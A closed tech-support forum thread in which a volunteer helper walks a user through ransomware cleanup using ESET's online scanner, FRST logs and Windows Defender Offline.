I mentioned those "ransom" related items for information.  Just that.  It would be of interest to you to read and see just what they said, and if there is the name of it in there.

Not necessarily to delete them.

 

But what you do need to do is to go ahead and go forth with running TFC + Combofix.


Maybe I may have overlooked it, but this pc does not have an installed antivirus program. Why?

It has to have one installed otherwise it is wide open for infection by viruses.

 

I notice it appears that on or about November 11 it was hit by a ransomware.

 

Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools
For directions on how, see http://www.bleepingcomputer.com/forums/index.php?showtopic=114351
How To Temporarily Disable Your Anti-virus, Firewall And Anti-malware Programs
Do NOT turn off the firewall

Close all open browsers at this point.

Start Internet Explorer (fresh) by pressing Start  >> Internet Explorer >> Right-Click and select Run As Administrator.
Using Internet Explorer browser only, go to ESET Online Scanner website:
http://www.eset.com/onlinescan/

Accept the Terms of Use and press Start button;

Approve the install of the required ActiveX Control, then follow on-screen instructions;

Enable (check) the Remove found threats option, and run the scan.

After the scan completes, the Details tab in the Results window will display what was found and removed. A logfile is created and located at C:\Program Files (x86)\Eset\EsetOnlineScanner\log.txt. Look at contents of this file using Notepad.

The Frequently Asked Questions for ESET Online Scanner can be viewed here
http://go.eset.com/us/online-scanner/faq

It is emphasized to temporarily disable any pc-resident {active} antivirus program prior to any on-line scan by any on-line scanner.
(And promptly re-enable it when finished.)

If you use Firefox, you have to install IETab, an add-on.  This is to enable ActiveX support.
Do not use the system while the scan is running. Once the full scan is underway, go take a long break  


Re-enable the antivirus program.

Reply with copy of the Eset scan log
 


I'll get right on it. And I do. I had Microsoft Security Essentials, and about a day or two before the ransomware I got Malwarebytes Premium. I installed it and everything, it worked, and after I thought I had cleaned my computer, I uninstalled Microsoft Security Essentials. Then the ransomware hit.


Hello,

 

When you tried to go to and run the ESET online scan, did you use Internet Explorer browser ?

 

I would like for you to locate the FRST64.exe you have in the Downloads folder.  I need a fresh set of reports.

Close any opened windows / apps.

Then run FRST64.exe

When replying, attach  the latest FRST.txt + Addition.txt

 

I suggest you get and run the Microsoft Windows Defender Offline. This is an "offline" tool that you boot the pc with and scan your system for malware.
To get started, find a blank CD, DVD, or USB flash drive with at least 250 MB of free space and then download and run the tool—the tool will help you create the removable media.

The basic sequence of steps is
a) Download and SAVE the tool to a unique folder/location on your pc  
b) Create the CD/DVD/USB-flash drive with tool (read all the directions at Microsoft {below} on how to make the media )
c) Set pc to boot from the offline media
d) Place media in & restart system
e) Run the tool.  Have infinite patience & have it scan the entire system. Remove any malware that is found.

Download & info link  http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline

The frequently asked questions for this tool
http://windows.microsoft.com/en-US/windows/windows-defender-offline-faq
 


  • 2 weeks later...

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

